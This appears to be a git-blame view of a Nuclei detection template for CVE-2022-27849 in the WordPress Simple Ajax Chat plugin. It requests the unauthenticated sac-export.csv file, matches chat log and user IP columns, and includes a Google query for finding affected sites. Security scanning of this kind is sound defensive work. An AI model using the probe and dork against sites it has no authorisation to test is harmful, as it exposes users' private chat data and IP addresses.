2022-04-22 09:11:27 +00:00
id : CVE-2022-27849
2022-08-22 07:17:05 +00:00
2022-04-22 09:11:27 +00:00
info :
2022-07-26 13:45:11 +00:00
name : WordPress Simple Ajax Chat <20220116 - Sensitive Information Disclosure vulnerability
2022-04-22 09:11:27 +00:00
author : random-robbie
2022-05-17 09:18:12 +00:00
severity : high
2022-04-22 09:11:27 +00:00
description : |
2022-07-26 13:45:11 +00:00
WordPress Simple Ajax Chat before 20220216 is vulnerable to sensitive information disclosure. The plugin does not properly restrict access to the exported data via the sac-export.csv file, which could allow unauthenticated users to access it.
2022-04-22 09:11:27 +00:00
reference :
- https://wordpress.org/plugins/simple-ajax-chat/#developers
2022-05-17 09:18:12 +00:00
- https://patchstack.com/database/vulnerability/simple-ajax-chat/wordpress-simple-ajax-chat-plugin-20220115-sensitive-information-disclosure-vulnerability
2022-07-26 13:45:11 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-27849
2022-04-22 09:11:27 +00:00
classification :
2022-05-17 09:18:12 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score : 7.5
2022-04-22 09:11:27 +00:00
cve-id : CVE-2022-27849
cwe-id : CWE-200
metadata :
2022-09-08 22:39:14 +00:00
google-query : inurl:/wp-content/plugins/simple-ajax-chat/
2022-04-22 09:11:27 +00:00
tags : wp,wordpress,wp-plugin,cve,cve2022,disclosure
requests :
- method : GET
path :
- '{{BaseURL}}/wp-content/plugins/simple-ajax-chat/sac-export.csv'
matchers-condition : and
matchers :
- type : word
part : body
words :
- '"Chat Log"'
- '"User IP"'
- '"User ID"'
condition : and
- type : word
part : header
words :
- text/csv
- type : status
status :
- 200
2022-07-26 13:45:11 +00:00
# Enhanced by mp on 2022/07/15